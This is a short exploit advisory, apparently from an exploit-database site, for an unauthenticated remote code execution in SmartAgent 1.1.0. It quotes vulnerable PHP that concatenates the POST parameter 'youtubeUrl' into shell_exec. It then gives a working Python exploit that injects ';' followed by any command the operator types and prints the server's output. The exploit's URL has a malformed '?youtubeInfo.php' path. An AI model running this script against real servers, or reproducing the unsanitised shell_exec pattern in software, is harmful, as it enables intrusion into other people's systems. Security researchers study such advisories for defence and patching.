Headline
SmartAgent 1.1.0 Remote Code Execution
SmartAgent version 1.1.0 suffers from an unauthenticated remote code execution vulnerability in youtubeInfo.php.
# Exploit Title: SmartAgent v1.1.0 - Unauthenticated Remote Code Execution# Date: 01-10-2024# Exploit Author: Alter Prime# Vendor Homepage: https://smarts-srlcom.com/, https://smartagent.com# Version: Build v1.1.0# Tested on: Kali LinuxAn unauthenticated user can access a php script called https://smarts-srlcom.com/youtubeInfo.php from the vulnerable web application and through a POST request with vulnerable parameter "youtubeUrl" a command injection vulnerability could be triggered.Vulnerable code snippet from youtubeInfo.php:"""$youtubeUrl=$_POST["youtubeUrl"];$command = 'youtube-dl -j ' . $youtubeUrl;echo shell_exec($command);"""Steps To Reproduce:1. Run the below python script on a vulnerable web application instance of SmartAgent v1.1.0#Python Exploitimport requestsurl = "https://smarts-srlcom.com?youtubeInfo.php"command = input("Enter the command you want to run \(EX: id\): ")postdata = { "youtubeUrl": ";" + command}response = requests.post(url, data=postdata, verify=False)print(response.text)